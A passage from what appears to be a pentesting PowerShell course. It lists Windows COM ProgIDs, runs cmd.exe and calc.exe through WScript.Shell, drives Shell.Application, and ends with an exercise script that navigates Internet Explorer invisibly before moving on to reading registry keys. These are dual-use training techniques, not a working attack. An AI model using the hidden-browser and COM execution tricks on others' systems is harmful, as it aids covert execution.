ErrorLookup.1\nJobObjIOActgInfoProv.JobObjIOActgInfoProv.1\nUPnP.UPnPServices.1\nnetcenter.NCLUA.1\nSystem.Security.Cryptography.FromBase64Transform\nSAPI.SpPhraseInfoBuilder.1\nMicrosoft.Update.AgentInfo.1\nWbemScripting.SWbemLastError.1\nSystem.Runtime.Remoting.Messaging.OneWayAttribute\nOlePrn.OleInstall.1\nbrowser_dll.ctlRegistryBrowser.2\nWinInetBroker.WinInetBroker.1\nDXImageTransform.Microsoft.CrBarn.1\nFDE.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapNegativeInteger\nSystem.Security.Cryptography.CryptographicUnexpectedOperationException\nSystem.Runtime.CompilerServices.NativeCppClassAttribute\nSysColorCtrl.SysColorCtrl.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapNmtoken\nSysmon.3\nPropshts.apmSheetIniFile.1\nndfapi.NDFAPI.1\nPropshts.apmPageStartGeneral.1\nUPnP.UPnPService.1\nCertificateAuthority.GetConfig.1\nFunctionDiscovery.Discovery.1\nSystem.Runtime.Remoting.Metadata.SoapParameterAttribute\nSAPI.SpWaveFormatEx.1\nMicrosoft.JScript.COMMethodInfo\nPropshts.apmPageNetShareInfo.1\nSystem.EnterpriseServices.RegistrationHelperTx\nMSDASQL.1\nMSDASQL ErrorLookup.1\nMSDASQLEnumerator.1\nMSDAER.1\nMSDAENUM.1\nMSDADC.1\nSnapins.FolderSnapin.1\nSnapins.OCXSnapin.1\nSnapins.HTMLSnapin.1\nCOMSNAP.ComponentDataImpl.1\nSAPI.SpUncompressedLexicon.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapDay\nSystem.RankException\nTSSDClient.SessionArbitrationHelper.1\nMicrosoft.JScript.COMFieldInfo\nIMEPad.imjpskey.15\nMicrosoft.IE.Manager\nSystem.Runtime.InteropServices.SEHException\nSystem.EnterpriseServices.Internal.SoapServerVRoot\npolmkr.apmGpeTasks.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapMonth\nCLRMetaData.CorRuntimeHost.2\nSPPWMI.SppWmiTokenActivationSigner.1\nSystem.ContextMarshalException\nHNetCfg.FwProducts\nSystem.DuplicateWaitObjectException\npolmkr.apmGpeServices.1\nJScript.Compact\nSystem.NonSerializedAttribute\nMSDASC.PDPO.1\nSystem.OutOfMemoryException\nCDO.Message.1\nCDO.Configuration.1\nCDO.DropDirectory.1\nCDO.SS_SMTPOnArrivalSink.1\nCDO.SS_NNTPOnPostSink.1\nCDO.SS_NNTPOnPostFinalSink.1\nCDO.SMTPConnector.1\nCDO.NNTPPostConnector.1\nCDO.NNTPFinalConnector.1\nCDO.NNTPEarlyConnector.1\nCDO.SS_NNTPOnPostEarlySink.1\nCTREEVIEW.CTreeViewCtrl.1\nWorkspaceBrokerAx.WorkspaceBrokerAx.1\nEventSystem.EventClass\nSystem.MissingMemberException\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapAnyUri\nIMAPI2FS.MsftIsoImageManager.1\nDFSRHelper.ADProxy.1\npolmkr.apmGpeShortcuts.1\nWindows.XamlDocument\nSAPI.SpMMAudioIn.1\ncommon_dll.apmSecurityExtension2.1\npolmkr.apmGpeStartMenu.1\nSystem.Runtime.Serialization.Formatters.InternalRM\nMsxml\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapTime\nPropshts.apmPageService.1\nPropshts.apmPageDesktopItems.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapNcName\nPropshts.apmSheetUsers.1\nDXImageTransform.Microsoft.Slide.1\nDefragEngine.DefragEngine.1\nSystem.Runtime.Serialization.FormatterConverter\nMicrosoft.XMLParser.1.0\nSystem.Security.Cryptography.MD5CryptoServiceProvider\nWbemScripting.SWbemRefresher.1\nMicrosoft.Update.Installer.1\nMsTscAx.MsTscAx.7\nWMINet_Utils.WmiSinkDemultiplexor.1\nSearch.AppContentFilter.1\nPropshts.apmPageStartAdvanced.1\nPaint.Picture\ncertadm.OCSPAdmin.1\nSystem.Resources.MissingSatelliteAssemblyException\nMSIME.Japan.IHDS.15\nPrintSys.CoFilterPipeline.1\nMSITFS1.0\nSystem.Reflection.CustomAttributeFormatException\nFunctionDiscovery.WSDPrintProxy.1\nRDSProfileHandler.1\nSystem.TypeUnloadedException\nGPOAdmin.Component.1\nNODEMGR.MMCVersionInfo.1\nSystem.Threading.Mutex\nPropshts.apmSheetDevice.1\nPropshts.apmSheetRegistryWizard.1\nbrowser_dll.ctlServiceBrowser.2\nCOMSNAP.SnapinAboutImpl.1\nSystem.EnterpriseServices.Internal.Publish\nSystem.EnterpriseServices.Internal.IISVirtualRoot\nSystem.EnterpriseServices.Internal.GenerateMetadata\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapQName\nSystem.Security.Cryptography.RSACryptoServiceProvider\nVss.VSSUI.1\nSAPI.SpDataKey.1\nSystem.Reflection.TargetParameterCountException\nSAPI.SpGramCompBackEnd.1\nSystem.Security.Cryptography.TripleDESCryptoServiceProvider\nSystem.NotSupportedException\nMicrosoft.DirectSoundGargleDMO.1\nSystem.Runtime.Remoting.ServerException\nDiskManagement.SnapInComponent\nMSExtOrganization\nPropshts.apmSheetDesktopItem.1\nDXImageTransform.Microsoft.MotionBlur.1\nWireless.About.1\nSystem.Runtime.Remoting.Channels.ClientChannelSinkStack\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapDuration\nPropshts.apmSheetRegValue.1\nGPOAdminCustom.WMICtrl.1\nSQLOLEDB Enumerator.1\nMSDAOSP.1\nSystem.Diagnostics.SymbolStore.SymLanguageVendor\nCOMSNAP.ComponentServicesExtensionSnapin.1\nPropshts.apmSheetTasksVista.1\nPropshts.apmPageDevGen.1\nPropshts.apmPageVpnAdvanced.1\nImeCommonAPIClassFactory1041.15\nGPOAdmin.ComponentData.1\nDiskManagement.SnapIn\nDiskManagement.DataObject\npolmkr.apmComponent.1\nUPnP.UPnPDeviceFinder.1\nPenIMC.PimcManager.4\nPropshts.apmSheetTaskbar.1\nKbproc.process.1\nndfapi.NetworkDiagnostics.1\nSAPI.SpNotifyTranslator.1\nHNetCfg.FwPolicy2\ntsuserex.ADsTSUserEx.1\nDXImageTransform.Microsoft.RevealTrans.1\nbrowser_dll.ctlDUNBrowser.2\nGPOAdminCustom.GPOInaccessibleCtrl.1\nSystem.Security.XmlSyntaxException\nSQLXMLX.1\nRemoteHelper.RemoteHelper\nMSIME.China.7\nWorkspace.PolicyProcessor.1\nFunctionDiscovery.PropertyStore.1\nPropshts.apmPageStartAdvancedVista.1\nVSS.VSSCoordinator.1\nCLRMetaData.CorMetaDataDispenser.2\nDXImageTransform.Microsoft.CrZigzag.1\nDXImageTransform.Microsoft.Shadow.1\nPropshts.apmPageImdTask.1\nSystem.Text.StringBuilder\nGPOAdminCustom.DomainCtrl.1\nSystem.Runtime.Serialization.Formatters.SoapMessage\nSystem.ExecutionEngineException\nSystem.EnterpriseServices.Internal.ClientRemotingConfig\nMicrosoft.WINDOWS.SQLLITE.Param.4.0\nSystem.Runtime.Remoting.Services.TrackingServices\nPropshts.apmSheetAppearance.1\nCompressedFolder\nSystem.BadImageFormatException\nIAS.SdoMachine.1\nDispatchMapper.DispatchMapper.1\nSystem.Runtime.CompilerServices.IDispatchConstantAttribute\nPropshts.apmPageNetDrive.1\nSystem.TimeoutException\nRemoteDesktopClient.RemoteDesktopClient.1\nShell.Explorer.1\nbrowser_dll.ctlMsiProductBrowser.2\nSystem.Security.VerificationException\nSystem.Globalization.ThaiBuddhistCalendar\nHNetCfg.FwAuthorizedApplication\nDXImageTransform.Microsoft.Barn.1\nCOMSVCS.TrackerServer\nEventPublisher.EventPublisher\nQC.Recorder\nQC.ListenerHelper\nnew\nqueue\nQC.DLQListener\nSystem.EnterpriseServices.Internal.ClrObjectFactory\nByot.ByotServerEx\nCrmClerk.CrmClerk.1\nCrmRecoveryClerk.CrmRecoveryClerk.1\nQC.MessageMover.1\nPdump.ProcessDump\npartition\nsoap\nCOMSVCS.CServiceConfig.1\nSystem.Security.HostProtectionException\nDfsShell.DfsShell.1\nSystem.Runtime.CompilerServices.CallConvFastcall\nSeVA.SeVAResultsCheck.1\nMicrosoft.XMLHTTP.1.0\nGPOAdminCustom.LinkedGPOCtrl.1\nFunctionDiscovery.PropertyStoreCollection.1\nScripting.Dictionary\nIEPH.HistoryHandler\nSystem.Security.Policy.GacInstalled\nSystem.Globalization.HijriCalendar\nSystem.Security.Cryptography.RSAPKCS1KeyExchangeDeformatter\nCOMSNAP.CPartitionSetContextMenu.1\nSystem.Security.SecurityException\nMicrosoft.DirectSoundCompressorDMO.1\nMicrosoft.DirectSoundDistortionDMO.1\nGPOAdmin.ListViewInformation.1\nSystem.EnterpriseServices.Internal.AppDomainHelper\nMicrosoft.DirectSoundEchoDMO.1\nSAPI.SpObjectToken.1\nDBRSTPRX.AsProxy.1\nDBRSTPRX.AsServer.1\nDBROWPRX.AsProxy.1\nDBROWPRX.AsServer.1\nMicrosoft.DirectSoundI3DL2ReverbDMO.1\nMicrosoft.DirectSoundFlangerDMO.1\nMicrosoft.WINDOWS.SQLLITE.Error.4.0\nPropshts.apmPageDesktopAppearance.1\nMicrosoft.DirectSoundChorusDMO.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapEntity\nConsolePower.ConsolePower.1\nVaultRoaming.SyncTaskHandler.1\nDXImageTransform.Microsoft.Stretch.1\nRSOPPROV.RsopPlanningModeProvider.1\nSystem.Reflection.AssemblyName\nCFmIfsEngine.CFmIfsEngine.1\nSystem.Runtime.InteropServices.TypeLibConverter\nNODEMGR.MMCDocConfig.1\nSystem.Runtime.InteropServices.ComImportAttribute\nPackage\nADsSecurityUtility\nWorkspace.ResTypeRegistry.1\nCmiv2.CmiFactory.2\nMSIME.Taiwan.15\nJScript\nJScript Author\nJScript.Encode\nPropshts.apmPageStartGeneralVista.1\nPropshts.apmPageDataSource.1\nMsxml2.XMLParser\nMsxml2.XMLParser.3.0\nMsxml2.DOMDocument.3.0\nMsxml2.FreeThreadedDOMDocument.3.0\nMsxml2.XMLSchemaCache.3.0\nMsxml2.XMLHTTP.3.0\nMsxml2.XSLTemplate.3.0\nMsxml2.DSOControl.3.0\nxmlfile\ncomponents.apmSecurityInformation.1\nDXImageTransform.Microsoft.Emboss.1\nDXImageTransform.Microsoft.Engrave.1\nGPMGMT.GPM.1\nPropshts.apmPagePowerAdvanced.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapBase64Binary\nSystem.IO.MemoryStream\nCOMAdmin.COMAdminCatalog.1\nSystem.DivideByZeroException\nSystem.EnterpriseServices.Internal.SoapServerTlb\nMsxml2.DOMDocument\nMsxml2.FreeThreadedDOMDocument\nMsxml2.DSOControl\nMsxml2.XMLHTTP\nPropshts.apmSheetStart.1\nScwRegistryExt.Registry.1\nNODEMGR.ComCacheCleanup.1\nGPOAdmin.CookieCutter.1\nDXImageTransform.Microsoft.RandomDissolve.1\nSPPUI.SPPUIObjectInteractive.1\nSystem.NotImplementedException\nMicrosoft.Update.ServiceManager.1\ncomponents.apmResultObject.1\ncertadm.OCSPPropertyCollection.1\nWScript.Shell.1\nWScript.Network.1\nRCM.ConnectionManager.1\nDXImageTransform.Microsoft.Light.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapId\nCOMSNAP.CUserPropPages.1\nDiskManagement.SnapInAbout\nMicrosoft.FeedsManager\nInternetShortcut\nSystem.Security.Cryptography.SHA1CryptoServiceProvider\nPropshts.apmPageFolderView.1\nMsxml2.MXXMLWriter\nAccClientDocMgr.AccClientDocMgr.1\nbidispl.bidirequestcontainer.1\nCorrEngine.CorrelationEngine.1\nScriptoSys.Scripto.1\nSystem.Runtime.Remoting.Lifetime.ClientSponsor\nMSExtOrganizationUnit\nSystem.Runtime.InteropServices.OutAttribute\nSystem.Security.Cryptography.SHA1Managed\nSSR.SsrCore.1\nMSDAURL.Binder.1\nKmSvc.CKmsCertEnroll\nShell.HWEventHandlerShellExecute.1\nSystem.ThreadStaticAttribute\nPS C:\\>\n```\n\n- Search for a particular ```COM``` object\n\n```PowerShell\nPS C:\\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\\CLSID -Include PROGID -Recurse | foreach {$_.GetValue(\"\")} | Where-Object {$_ -match \"wscript\"}\nWScript.Network.1\nWScript.Shell.1\nWScript.Shell.1\nWScript.Network.1\nPS C:\\>\n```\n\n###### Creating and Using COM objects\n\n- ```WScript.Shell.1```\n\n```PowerShell\nPS C:\\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\\CLSID -Include PROGID -Recurse | foreach {$_.GetValue(\"\")} | Where-Object {$_ -match \"wscript\"}\nWScript.Network.1\nWScript.Shell.1\nWScript.Shell.1\nWScript.Network.1\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $wscript = New-Object -ComObject WScript.Shell.1\n```\n\n```PowerShell\nPS C:\\> $wscript | Get-Member\n\n TypeName: System.__ComObject#{41904400-be18-11d3-a28b-00104bd35090}\n\nName MemberType Definition\n---- ---------- ----------\nAppActivate Method bool AppActivate (Variant, Variant)\nCreateShortcut Method IDispatch CreateShortcut (string)\nExec Method IWshExec Exec (string)\nExpandEnvironmentStrings Method string ExpandEnvironmentStrings (string)\nLogEvent Method bool LogEvent (Variant, string, string)\nPopup Method int Popup (string, Variant, Variant, Variant)\nRegDelete Method void RegDelete (string)\nRegRead Method Variant RegRead (string)\nRegWrite Method void RegWrite (string, Variant, Variant)\nRun Method int Run (string, Variant, Variant)\nSendKeys Method void SendKeys (string, Variant)\nEnvironment ParameterizedProperty IWshEnvironment Environment (Variant) {get}\nCurrentDirectory Property string CurrentDirectory () {get} {set}\nSpecialFolders Property IWshCollection SpecialFolders () {get}\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $wscript.CurrentDirectory\nC:\\Users\\Administrator\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $wscript.Popup(\"PowerShell\")\n1\nPS C:\\>\n```\n\n![Image of Popup](images/8.jpeg)\n\n```PowerShell\nPS C:\\> $wscript.SendKeys(\"PowerShell\")\nPS C:\\> PowerShell\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $wscript.Exec(\"cmd.exe\")\n\nStatus : 0\nStdIn : System.__ComObject\nStdOut : System.__ComObject\nStdErr : System.__ComObject\nProcessID : 3544\nExitCode : 0\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $wscript.Exec(\"calc.exe\")\n\nStatus : 0\nStdIn : System.__ComObject\nStdOut : System.__ComObject\nStdErr : System.__ComObject\nProcessID : 3272\nExitCode : 0\n\nPS C:\\>\n```\n\n![Image of Popup](images/9.jpeg)\n\n- ```Shell.Application.1```\n\n```PowerShell\nPS C:\\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\\CLSID -Include PROGID -Recurse | foreach {$_.GetValue(\"\")} | Where-Object {$_ -match \"Shell.Application\"}\nShell.Application.1\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $ShellApp = New-Object -ComObject Shell.Application.1\n```\n\n```PowerShell\nPS C:\\> $ShellApp | Get-Member\n\n TypeName: System.__ComObject#{286e6f1b-7113-4355-9562-96b7e9d64c54}\n\nName MemberType Definition\n---- ---------- ----------\nAddToRecent Method void AddToRecent (Variant, string)\nBrowseForFolder Method Folder BrowseForFolder (int, string, int, Variant)\nCanStartStopService Method Variant CanStartStopService (string)\nCascadeWindows Method void CascadeWindows ()\nControlPanelItem Method void ControlPanelItem (string)\nEjectPC Method void EjectPC ()\nExplore Method void Explore (Variant)\nExplorerPolicy Method Variant ExplorerPolicy (string)\nFileRun Method void FileRun ()\nFindComputer Method void FindComputer ()\nFindFiles Method void FindFiles ()\nFindPrinter Method void FindPrinter (string, string, string)\nGetSetting Method bool GetSetting (int)\nGetSystemInformation Method Variant GetSystemInformation (string)\nHelp Method void Help ()\nIsRestricted Method int IsRestricted (string, string)\nIsServiceRunning Method Variant IsServiceRunning (string)\nMinimizeAll Method void MinimizeAll ()\nNameSpace Method Folder NameSpace (Variant)\nOpen Method void Open (Variant)\nRefreshMenu Method void RefreshMenu ()\nSearchCommand Method void SearchCommand ()\nServiceStart Method Variant ServiceStart (string, Variant)\nServiceStop Method Variant ServiceStop (string, Variant)\nSetTime Method void SetTime ()\nShellExecute Method void ShellExecute (string, Variant, Variant, Variant, Variant)\nShowBrowserBar Method Variant ShowBrowserBar (string, Variant)\nShutdownWindows Method void ShutdownWindows ()\nSuspend Method void Suspend ()\nTileHorizontally Method void TileHorizontally ()\nTileVertically Method void TileVertically ()\nToggleDesktop Method void ToggleDesktop ()\nTrayProperties Method void TrayProperties ()\nUndoMinimizeALL Method void UndoMinimizeALL ()\nWindows Method IDispatch Windows ()\nWindowsSecurity Method void WindowsSecurity ()\nWindowSwitcher Method void WindowSwitcher ()\nApplication Property IDispatch Application () {get}\nParent Property IDispatch Parent () {get}\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $ShellApp.Parent\n\nApplication Parent\n----------- ------\nSystem.__ComObject System.__ComObject\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $ShellApp.Application\n\nApplication Parent\n----------- ------\nSystem.__ComObject System.__ComObject\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $ShellApp.MinimizeAll()\n```\n\n```PowerShell\nPS C:\\> $ShellApp.CascadeWindows()\n```\n\n![Image of Cascade](images/10.jpeg)\n\nRun the Script ```Ie-Com.ps1```\n\n```PowerShell\nPS C:\\> $ShellApp.Windows()\n\nApplication : System.__ComObject\nParent : System.__ComObject\nContainer :\nDocument : System.__ComObject\nTopLevelContainer : True\nType : HTML Document\nLeft : 36\nTop : 36\nWidth : 900\nHeight : 600\nLocationName : Google\nLocationURL : https://www.google.com/?gws_rd=ssl\nBusy : False\nName : Internet Explorer\nHWND : 131558\nFullName : C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\nPath : C:\\Program Files (x86)\\Internet Explorer\\\nVisible : False\nStatusBar : False\nStatusText :\nToolBar : 1\nMenuBar : True\nFullScreen : False\nReadyState : 4\nOffline : False\nSilent : False\nRegisterAsBrowser : False\nRegisterAsDropTarget : True\nTheaterMode : False\nAddressBar : True\nResizable : True\n\nPS C:\\> \n```\n\nStop the ```ie``` process using ```Task Manager```\n\n```PowerShell\nPS C:\\> $ShellApp.Windows()\n```\n\n```PowerShell\nPS C:\\> $ShellApp.FileRun()\n```\n\n![Image of Run](images/11.jpeg)\n\n```PowerShell\nPS C:\\> $ShellApp.BrowseForFolder(0,\"Please select the folder --- \",1,\"\")\n\nTitle : Videos\nApplication : System.__ComObject\nParent :\nParentFolder : System.__ComObject\nSelf : System.__ComObject\nOfflineStatus :\nHaveToShowWebViewBarricade : False\nShowWebViewBarricade : False\n\nPS C:\\>\n```\n\n![Image of Run](images/12.jpeg)\n\n```PowerShell\nPS C:\\> $ShellApp.Explore(0)\n```\n\n![Image of Run](images/13.jpeg)\n\n```PowerShell\nPS C:\\> $ShellApp.FindComputer()\n```\n\n![Image of Run](images/14.jpeg)\n\n###### Exercise\n\n- Use ```COM``` object for ```Internet Explorer``` to navigate to a website without ```visibility```.\n\n```PowerShell\nPS C:\\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\\CLSID -Include PROGID -Recurse | foreach {$_.GetValue(\"\")} | Where-Object {$_ -match \"internet\"}\nInternetExplorer.Application.1\nInternet.HHCtrl.1\nInternet.HHCtrl.1\npolmkr.apmGpeInternet.1\nInternet.HHCtrl.1\nInternetShortcut\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> $ie_o = New-Object -ComObject InternetExplorer.Application.1\n```\n\n```PowerShell\nPS C:\\> $ie_o | Get-Member\n\n TypeName: System.__ComObject#{d30c1661-cdaf-11d0-8a3e-00c04fc9e26e}\n\nName MemberType Definition\n---- ---------- ----------\nClientToWindow Method void ClientToWindow (int, int)\nExecWB Method void ExecWB (OLECMDID, OLECMDEXECOPT, Variant, Variant)\nGetProperty Method Variant GetProperty (string)\nGoBack Method void GoBack ()\nGoForward Method void GoForward ()\nGoHome Method void GoHome ()\nGoSearch Method void GoSearch ()\nNavigate Method void Navigate (string, Variant, Variant, Variant, Variant)\nNavigate2 Method void Navigate2 (Variant, Variant, Variant, Variant, Variant)\nPutProperty Method void PutProperty (string, Variant)\nQueryStatusWB Method OLECMDF QueryStatusWB (OLECMDID)\nQuit Method void Quit ()\nRefresh Method void Refresh ()\nRefresh2 Method void Refresh2 (Variant)\nShowBrowserBar Method void ShowBrowserBar (Variant, Variant, Variant)\nStop Method void Stop ()\nAddressBar Property bool AddressBar () {get} {set}\nApplication Property IDispatch Application () {get}\nBusy Property bool Busy () {get}\nContainer Property IDispatch Container () {get}\nDocument Property IDispatch Document () {get}\nFullName Property string FullName () {get}\nFullScreen Property bool FullScreen () {get} {set}\nHeight Property int Height () {get} {set}\nHWND Property int HWND () {get}\nLeft Property int Left () {get} {set}\nLocationName Property string LocationName () {get}\nLocationURL Property string LocationURL () {get}\nMenuBar Property bool MenuBar () {get} {set}\nName Property string Name () {get}\nOffline Property bool Offline () {get} {set}\nParent Property IDispatch Parent () {get}\nPath Property string Path () {get}\nReadyState Property tagREADYSTATE ReadyState () {get}\nRegisterAsBrowser Property bool RegisterAsBrowser () {get} {set}\nRegisterAsDropTarget Property bool RegisterAsDropTarget () {get} {set}\nResizable Property bool Resizable () {get} {set}\nSilent Property bool Silent () {get} {set}\nStatusBar Property bool StatusBar () {get} {set}\nStatusText Property string StatusText () {get} {set}\nTheaterMode Property bool TheaterMode () {get} {set}\nToolBar Property int ToolBar () {get} {set}\nTop Property int Top () {get} {set}\nTopLevelContainer Property bool TopLevelContainer () {get}\nType Property string Type () {get}\nVisible Property bool Visible () {get} {set}\nWidth Property int Width () {get} {set}\n\nPS C:\\>\n```\n\n```Ie-Com.ps1```\n\n```PowerShell\n$url = \"http://www.google.com\"\n\n$ie_o = New-Object -ComObject InternetExplorer.Application.1\n\n$ie_o.visible = $False;\n\n$ie_o.navigate($url);\n```\n\n- Explore ```Shell.Application``` ```COM``` object and try some of the available methods.\n - [Look above](https://github.com/Kan1shka9/PowerShell-for-Pentesters/blob/master/35-COM-and-Powershell.md#creating-and-using-com-objects)\n" }, { "path": "36-Registry-and-Powershell-Part-1.md", "content": "#### 36. Registry and Powershell Part 1\n\n###### Reading Windows Registry\n\n- Registry Provider\n\n```PowerShell\nPS C:\\> Get-PSProvider -PSProvider Registry\n\nName Capabilities Drives\n---- ------------ ------\nRegistry ShouldProcess, Transactions {HKLM, HKCU}\n\nPS C:\\>\n```\n\n- Reading Registry\n\n - ```Get-Item```\n\n\t```PowerShell\n\tPS C:\\> Get-Item 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n\t\n\t Hive: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\n\t\n\t\n\tName Property\n\t---- --------\n\tCurrentVersion SystemRoot : C:\\Windows\n\t SoftwareType : System\n\t RegisteredOwner : Windows User\n\t InstallDate : 1499628648\n\t CurrentVersion : 6.3\n\t CurrentBuild : 9600\n\t RegisteredOrganization :\n\t CurrentType : Multiprocessor Free\n\t InstallationType : Server\n\t EditionID : ServerStandardEval\n\t ProductName : Windows Server 2012 R2 Standard Evaluation\n\t ProductId : 00252-10000-00000-AA228\n\t DigitalProductId : {164, 0, 0, 0...}\n\t DigitalProductId4 : {248, 4, 0, 0...}\n\t CurrentBuildNumber : 9600\n\t BuildLab : 9600.winblue_ltsb.170613-0600\n\t BuildLabEx : 9600.18730.amd64fre.winblue_ltsb.170613-0600\n\t BuildGUID : ffffffff-ffff-ffff-ffff-ffffffffffff\n\t PathName : C:\\Windows\n\t UBR : 18756\n\t\n\tPS C:\\>\n\t```\n\n\t- ```Get-ItemProperty```\n\n\t```PowerShell\n\tPS C:\\> Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n\t\n\tSystemRoot : C:\\Windows\n\tSoftwareType : System\n\tRegisteredOwner : Windows User\n\tInstallDate : 1499628648\n\tCurrentVersion : 6.3\n\tCurrentBuild : 9600\n\tRegisteredOrganization :\n\tCurrentType : Multiprocessor Free\n\tInstallationType : Server\n\tEditionID : ServerStandardEval\n\tProductName : Windows Server 2012 R2 Standard Evaluation\n\tProductId : 00252-10000-00000-AA228\n\tDigitalProductId : {164, 0, 0, 0...}\n\tDigitalProductId4 : {248, 4, 0, 0...}\n\tCurrentBuildNumber : 9600\n\tBuildLab : 9600.winblue_ltsb.170613-0600\n\tBuildLabEx : 9600.18730.amd64fre.winblue_ltsb.170613-0600\n\tBuildGUID : ffffffff-ffff-ffff-ffff-ffffffffffff\n\tPathName : C:\\Windows\n\tUBR : 18756\n\tPSPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\n\tPSParentPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\n\tPSChildName : CurrentVersion\n\tPSDrive : HKLM\n\tPSProvider : Microsoft.PowerShell.Core\\Registry\n\t\n\tPS C:\\>\n\t```\n\n\t```PowerShell\n\tPS C:\\> Get-ItemProperty 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' | Format-List *\n\t\n\tSystemRoot : C:\\Windows\n\tSoftwareType : System\n\tRegisteredOwner : Windows User\n\tInstallDate : 1499628648\n\tCurrentVersion : 6.3\n\tCurrentBuild : 9600\n\tRegisteredOrganization :\n\tCurrentType : Multiprocessor Free\n\tInstallationType : Server\n\tEditionID : ServerStandardEval\n\tProductName : Windows Server 2012 R2 Standard Evaluation\n\tProductId : 00252-10000-00000-AA228\n\tDigitalProductId : {164, 0, 0, 0...}\n\tDigitalProductId4 : {248, 4, 0, 0...}\n\tCurrentBuildNumber : 9600\n\tBuildLab : 9600.winblue_ltsb.170613-0600\n\tBuildLabEx : 9600.18730.amd64fre.winblue_ltsb.170613-0600\n\tBuildGUID : ffffffff-ffff-ffff-ffff-ffffffffffff\n\tPathName : C:\\Windows\n\tUBR : 18756\n\tPSPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\n\tPSParentPath : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\n\tPSChildName : CurrentVersion\n\tPSDrive : HKLM\n\tPSProvider : Microsoft.PowerShell.Core\\Registry\n\t\n\tPS C:\\>\n\t```\n\t\n\t- ```Get-ChildItem```\n\n\t```PowerShell\n\tPS C:\\> Get-ChildItem 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n\t\n\t Hive: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\n\t\n\t\n\tName Property\n\t---- --------\n\tAccessibility\n\tActive Directory\n\tAeDebug UserDebuggerHotKey : 0\n\tAppCompatFlags MirrorCompatBinaryExtension : C:\\Windows\\System32\\MirrorDrvCompat.dll\n\t AmiCacheVersion : 2\n\tASR OfflineDriverInjectionExtension : drvstore.dll,DriverStoreOfflineAddDriverPackageW\n\tAudit\n\tBackgroundModel\n\tCompatibility32 winword : 0x80000000\n\tConsole\n\tCorruptedFileRecovery TraceLevel : 0\n\t RunCount : 0\n\tDefaultProductKey ProductId : 00252-10000-00001-AA599\n\t DigitalProductId : {164, 0, 0, 0...}\n\t DigitalProductId4 : {248, 4, 0, 0...}\n\tDeviceDisplayObjects DeviceStatusPropertyDescriptionList :\n\t prop:System.Devices.Status;System.PrintStatus.ErrorStatus;System.PrintStatus.WarningStatus;System.PrintStatus.DocumentCount;System.PrintStatus.InfoStatus;System.Pri\n\t ntStatus.Preferences;System.ScanStatus.Profile;System.PrintStatus.Location;System.PrintStatus.Comment;System.Devices.Connected\n\tDNS Server\n\tdrivers.desc wdmaud.drv : Microsoft 1.1 UAA Function Driver for High Definition Audio\n\tDrivers32 vidc.yuy2 : msyuv.dll\n\t vidc.i420 : iyuv_32.dll\n\t msacm.msgsm610 : msgsm32.acm\n\t msacm.msg711 : msg711.acm\n\t vidc.yvyu : msyuv.dll\n\t vidc.yvu9 : tsbyuv.dll\n\t wavemapper : msacm32.drv\n\t midimapper : midimap.dll\n\t vidc.uyvy : msyuv.dll\n\t vidc.iyuv : iyuv_32.dll\n\t vidc.mrle : msrle32.dll\n\t msacm.imaadpcm : imaadp32.acm\n\t msacm.msadpcm : msadp32.acm\n\t vidc.msvc : msvidc32.dll\n\t wave : wdmaud.drv\n\t midi : wdmaud.drv\n\t mixer : wdmaud.drv\n\t aux : wdmaud.drv\n\tEFS\n\tEvent Viewer MicrosoftRedirectionURL : http://go.microsoft.com/fwlink/events.asp\n\t MicrosoftRedirectionProgramCommandLineParameters :\n\t MicrosoftRedirectionProgram :\n\tFont Drivers Adobe Type Manager : atmfd.dll\n\tFont Management Auto Deactivation Exclude : {Calibri, Cambria, Consolas, Georgia...}\n\t Metadata : C:\\Windows\\Fonts\\fms_metadata.xml\n\tFontDPI LogPixels : 96\n\tFontLink FontLinkControl : 0\n\t FontLinkDefaultChar : 12539\n\tFontMapper @MS Mincho : 57472\n\t @MS Gothic : 41088\n\t @GulimChe : 41089\n\t @Batang : 24705\n\t @PMingLiU : 8328\n\t MingLiU : 32904\n\t MS Gothic : 32896\n\t @BatangChe : 57473\n\t @MS PGothic : 8320\n\t @DotumChe : 45185\n\t @MS PMincho : 24704\n\t BatangChe : 49281\n\t 